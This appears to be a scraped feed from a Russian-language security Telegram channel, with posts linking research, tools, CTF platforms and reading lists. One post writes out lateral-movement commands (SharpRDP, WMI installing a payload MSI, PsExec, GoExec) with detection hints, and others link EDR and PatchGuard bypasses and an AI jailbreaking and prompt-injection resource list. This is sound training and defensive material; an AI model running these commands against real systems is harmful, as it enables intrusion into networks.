💻 Windows EPM Poisoning

Очень большой разбор (eng)

▪️ Research

#windows #rpc #epm

✈️ Whitehat Lab 💬Chat

Горизонтальное перемещение: тени в инфраструктуре

Пост имеет ознакомительный характер и предназначена для специалистов по безопасности. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.

Продолжаем говорить про перемещение, сегодня будут интересные утилиты.

Тихий проход через Headless RDP 😑
Представьте: вы хотите попасть с одной машины на другую, но не размахивая флагом в логах. Один из элегантных способов — Headless RDP через SharpRDP. Команда:

SharpRDP.exe computername=DC01 command=calc username=OFFENSE\admin password=Passw0rd

Вот и вы уже запускаете код на удаленном узле, без графического окна и лишних признаков. Защитникам в таких случаях стоит обращать внимание на неожиданные загрузки mstscax.dll или RDP-трафик без интерактивной сессии.

WMI с MSI: установка, которая не то, чем кажется 🤯
Другой и один из любимых методов — WMI с деплоем MSI. С точки зрения системы, это установка пакета, но внутри — полезная нагрузка:

Invoke-WmiMethod -Path Win32_Product -Name Install -ArgumentList @($true,"","\\192.168.1.4\share\payload.msi") -ComputerName TARGET -Credential $cred

Стороне атаки такой способ дает тишину, стороне защиты — повод мониторить необычные MSI-установки через WMI.

PsExec: громкий, но надежный 🍞
Но нельзя обойти стороной и классику — PsExec. Это инструмент, который админы обожают за удобство, а синие команды — за предсказуемые следы. Запуск может выглядеть так:

PsExec.exe \\TARGET -u Domain\Admin -p P@ssword cmd.exe

Быстро, просто… и громко: появляется служба PSEXESVC, фиксируется SMB-трафик, остаются артефакты. Опытный атакующий может переименовать службу, очистить следы или использовать модифицированные версии. Опытный защитник — найдет их по событию 7045, именованным каналам \\.\pipe\psexesvc и подозрительным RPC-запросам.

GoExec: современный шпион 👀
Тем, кто ценит тишину, стоит взглянуть на GoExec — современный аналог, умеющий работать через прокси и минимизировать новые артефакты. Он не так распространен, поэтому часто проходит под радаром:

goexec --method scmr change --proxy 127.0.0.1:1080 TARGET_IP command.exe

Для атакующего — это способ двигаться в полутьме, для защитника — повод расширить поведенческую аналитику.

Как итог 🍩
Весь этот арсенал объединяет простая логика: чем ближе способ к легитимной административной операции, тем сложнее его заметить. Для красных команд это значит — мимикрировать под штатную работу админа. Для синих — изучить эти «будни администратора» так, чтобы любое несоответствие бросалось в глаза.

Если вы дочитали до этого места — значит, вам точно интересна эта кухня. Поддержите статью лайком и подпишитесь на канал — впереди еще больше разборов, техник и историй с обеих сторон.

💻 Command Challenge

Нашел очередную, но достойную интерактивную платформу для тренировки работы в командной строке 🐧Linux. Так еще и oneliners просят 👍😱

🔗 cmdchallenge.com

Здесь и здесь более продвинутый уровень, либо оболочка bash ограничена

Знаете ли вы как можно вывести список всех файлов в директории не использую ls, а сделать это использую только echo ? 😳😁

#linux #cmd #bash

✈️ Whitehat Lab 💬Chat

👩‍💻 Awesome prompt hacking

Список ресурсов для тех, кто интересуется AI Red Teaming, Jailbreaking и Prompt Injection

💻 Repo

#llm #ai #prompt

✈️ Whitehat Lab 💬Chat

🔒 BitLocker Registry Exploited via WMI for Code Execution

A newly discovered lateral movement technique, revealed through the BitLockMove proof-of-concept, demonstrates how attackers can exploit BitLocker’s Component Object Model (COM) structure to execute malicious code under the context of an interactive user

🔗 Lateral Movement - BitLocker

#bitlocker #wmi #windows #redteam

✈️ Whitehat Lab 💬Chat

📨 NoSQL injections

Немного про NoSQL инъекции

🔗 General details
🔗 Getting rid of pre-/post-conditions in NoSQLi
🔗 NoSQL error-based injection
🔗 Payloads

#web #pentest #nosql

✈️ Whitehat Lab 💬Chat

🔄 🚩 💻Список площадок для оттачивания навыков этичного хакинга, подойдет для тренировок, CTF и не только

UPD. Добавил пару площадок для SOC

😉 Hack The Box

Windows, *nix машины для самостоятельного пентеста. Во free тарифе всегда доступно 20 машин. Обучение, академия, лабы и т.д. Есть огромное количество CTF заданий в различных категориях.
Возможность сдать экзамены и получить сертификаты CBBH (Certified Bug Bounty Hunter), CPTS (Certified Penetration Testing Specialist), CWEE (Certified Web Exploitation Expert) и CDSA (Certified Defensive Security Analyst), CAPE (Certified Active Directory Pentesting Expert)

😉 TryHackMe

Аналог HackTheBox без CTF заданий. Академия в наличии

😉 PortSwigger

Академия веб пентеста от создателей BurpSuite. Для сдачи экзамена необходима активная подписка на Burp Suite Professional, цена экзамена 99$

😉 CTFtime

Информацию почти обо всех прошедших и предстоящих CTF соревнованиях можно найти здесь

😉 HackerLab

Русскоязычная площадка 😎. Большое количество CTF задач в самых различных категориях, в наличии Windows и Linux машины

😉 CryptoHack

Один из лучших ресурсов с задачами по криптографии. Нравится криптография ? Вам сюда, от азов до сложнейших задач

😉 Standoff365

Киберполигон от компании Positive Technologies. Это виртуальная инфраструктура с реалистичными копиями IT-систем из разных отраслей

😉 TaipanByte CTF

Русскоязычная площадка от ребят из команды TaipanByte, большое кол-во задач во всех основных категориях

😉 pwn.college

Образовательная платформа, позволяющая изучать и практиковать основные концепции кибербезопасности. Рассчитана на новичков

😉 Kontra

Appsec тренировки, LLM, owasp top10, owasp api top10, aws top10 и т.д.

😉 Linux Journey

Путешествие в мир Linux, основные команды, лабы, руководства

😉 OverTheWire Bandit

Игра из 34 уровней для изучения Linux

😉 Crackmes

Большое количество (~4000) крякми для изучения. Подойдет реверсерам

😉 Pwnable

Для любителей бинарной эксплуатации (PWN)

😉 Cyber-Ed

Русскоязычная площадка. One task of the month - выкладывают по 1ой CTF задаче в месяц

😉 Root Me

Огромное (500+) кол-во заданий в самых разных категориях

😉 picoCTF

Площадка с CTF заданиями начального уровня, почти на все задания можно найти райтапы

😉 Exploit Education

ВМ Phoenix для изучения уязвимостей, разработки эксплойтов, отладки программного обеспечения и общих проблем кибербезопасности

😉 0xf.at

Парольные загадки (ребусы), например, пароль это сумма чисел от 1 до 446, соответственно надо написать простенькую автоматизацию и ввести в поле ввода

😉 Hacker Test

Простенький хакер квест состоящий из 20 уровней

Пара платформ для защитников:

😉 LetsDefend

Расследование реальных кибератак внутри смоделированного SOC

😉 Blue Team Training

Практическое обучение по кибербезопасности, а также развитие навыков в лабораториях CyberRange

⚠️ P.S. Если вы знаете подобные площадки, лично проверяли и они заслуживают внимания, пишите пожалуйста в чат - @whitehat_chat

#crackmes #hacking #ctf #ethical

✈️ Whitehat Lab 💬Chat

🚀 AI Engineering Hub

Подробные руководства по LLMs and RAGs

💻 Repo

#ai #llm #rag

✈️ Whitehat Lab 💬Chat

https://cymulate.com/blog/zero-click-one-ntlm-microsoft-security-patch-bypass-cve-2025-50154/

#windows #cve

✈️ Whitehat Lab 💬Chat

⚙ BamboozlEDR

Генератор различных событий (EventID) для тестирования EDR

Microsoft-Windows-Antimalware - Threat detection events (Event ID 48)
Microsoft-Windows-Antimalware-RTP - Real-time protection events (Event IDs 27, 14)
Microsoft-Windows-LDAP-Client - LDAP search and authentication events
Microsoft-Windows-TCPIP - TCP/IP connection events
Microsoft-Windows-WMI-Activity - WMI query and execution events (Event IDs 22, 11)
Microsoft-Windows-AMSI - AMSI scan events
Microsoft-Windows-Defender - Windows Defender events (Event IDs 5000, 5001, 1116, 1117)
Microsoft-Windows-DotNETRuntime - .NET runtime events
Microsoft-Windows-Crypto-DPAPI-Events - DPAPI access events
Microsoft-Windows-Security-Auditing - Security audit events (Event ID 4688)
Microsoft-Windows-PowerShell - PowerShell commandlet and AMSI events
Microsoft-Windows-RPC - RPC function trace events (Event ID 14)
Microsoft-Windows-CodeIntegrity - Code Integrity events (Event IDs 3023, 3036, 3076, 3077)
Microsoft-Windows-AppLocker - AppLocker events (Event IDs 8003, 8004, 8006, 8007, 8021, 8022, 8024, 8025)
Microsoft-Windows-NTLM - NTLM blocking events (Event ID 8001)

💻 Repo

#edr #golang

✈️ Whitehat Lab 💬Chat

Всем 👋! Это Bagley

💬 Всё чаще стал замечать в тематических каналах вопросы:

Как смочь в этом направлении. Дайте дельных советов. Очень интересная тема, но где нырять в неё чтобы не слишком глубоко было. Какую литературу почитать для хорошего фундамента можно?

хотелось бы вникнуть и научится (желательно бесплатно)

с чего начать, что почитать, где посмотреть?

💭 Чтобы облегчить задачу с поиском, поделюсь своим мнением по этому поводу (📖 Для начала ознакомиться с этим постом)


#️⃣ Литература
🔘The Web Application Hackers Handbook
🔘Ловушка для багов. Полевое руководство по веб-хакингу
🔘Bug Bounty Bootcamp The Guide to Finding and Reporting Web Vulnerabilities
🔘Bug Bounty Playbook
🔘Bug Bounty Hunting Essentials
🔘Web Hacking 101
🔘The tangled Web a guide to securing modern Web applications
⚠️Немного для мобилок
🔘Android Security Internals
🔘IOS Application Security

#️⃣ Методологии
🔘Bug Hunters Methodology от JHaddix'a: Recon и App Analysis Master
🔘ZSeanos methodology
🔘WSTG от OWASP

#️⃣ YouTube каналы
🔘PinkDraconian
🔘NahamSec
🔘Bug Bounty Reports Explained
🔘STÖK
🔘Rana Khalil
🔘InsiderPhD
🔘John Hammond

➕ множество тематических TG-каналов
➕ личные страницы исследователей, например в X

#learning

💻 🗂 Доклады с конференции Black Hat USA 2025

Notes from Black Hat USA 2024:

“I hate to report it, but the Russian underground is as strong as ever”

🎃👍

💻 Slides

#pentest #blackhat #blackhatusa

✈️ Whitehat Lab 💬Chat

💻 kurasagi is full POC of PatchGuard bypass for Windows 24H2

💻 Repo

#windows

✈️ Whitehat Lab 💬Chat

🔄 😀 CATS v13.3.2 (Contract API Testing and Security)

Продвинутый REST API фаззер с высокой скоростью работы. Строит HTML отчеты по окончании. Очень подробная документация на официальном сайте. Написан на 💻 Java

UPD. 13.3.2

Запуск в режиме black box:

cats --contract=openapi.yml -H "Authorization=$token" --server=https://api-url.com -b -k

Запуск в режиме context mode:

cats --contract=openapi.yaml --server=http://localhost:8080 --headers=headers.yml --refData=referenceData.yml

Запуск в режиме continuous fuzzing:

cats random --contract=openapi.yaml --server=http://localhost:8080 -H "API-KEY=$token" --mc 500 --path "/users/auth" -X POST --stopAfterTimeInSec 10

💻 Repo
💻 Download
📔 Docs
📚 Тестируем Github API с CATS

#soft #cats #java #fuzzer #web

✈️ Whitehat Lab 💬Chat

💻 explainshell

Интерактивная памятка по 🐧Linux утилитам

🔗 Web
💻 Repo

#linux #shell

✈️ Whitehat Lab 💬Chat

🛡 Operation Serengeti 2.0

Тут отчет и инфографика от интерпола подъехали

Что по цифрам ?

▪️ Произведено 1209 арестов
▪️ 87858 жертв

Удалось вернуть более $97млн, правда украдено было чуть побольше, $484млн😱
Такая скоординированная операция на криптоскам и ransomware ребят из африканских стран

Ладно, всем хороших выходных, можно бахнуть, но главное не 🎩 блечить 😅

#ransomware

✈️ Whitehat Lab 💬Chat

🚩 Kuban CTF Quals

Начались отборы на Kuban CTF, если кто принимает участие, пишите в чат, интересно 😱

🔗 https://kubanctf2025.ru
🔗 https://kubanctf2025.ru/scoreboard

#ctf

✈️ Whitehat Lab 💬Chat

💻 Elastic Defend Bypass: UAC Bypass Chain Leading To Silent Elevation

A chained technique has been identified that allows a local, unprivileged attacker to achieve silent privilege escalation to administrator by bypassing protections enforced by Elastic Defend v9.0.4. The method leverages a trusted auto-elevated Windows binary (fodhelper.exe) in conjunction with a registry hijack and COM object execution, resulting in arbitrary code execution at elevated privileges - without triggering a UAC prompt or EDR detection

🔗 UAC Bypass
💻 Presentation

#uac #bypass #windows #lpe

✈️ Whitehat Lab 💬Chat